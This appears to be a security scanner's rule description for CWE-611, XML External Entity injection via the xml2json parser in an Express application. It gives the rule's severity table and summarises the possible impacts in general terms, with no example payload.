Improper Restriction of XML External Entity Reference
| Property | |
|---|---|
| Language |  |
| Severity |  |
| CWE | CWE-611: Improper Restriction of XML External Entity Reference |
| OWASP | A04:2017 - XML External Entities (XXE) |
| Confidence Level | Medium |
| Impact Level | Medium |
| Likelihood Level | Medium |
Description#
User-supplied data is being passed directly to the xml2json XML parser in your Express application without proper validation or sanitization. This can allow attackers to inject malicious XML content, leading to XML External Entity (XXE) vulnerabilities.
Impact#
If exploited, attackers could read sensitive files from your server, perform server-side request forgery (SSRF), or cause denial of service. This could expose confidential information, compromise server integrity, or be used as a foothold for further attacks against your application or infrastructure.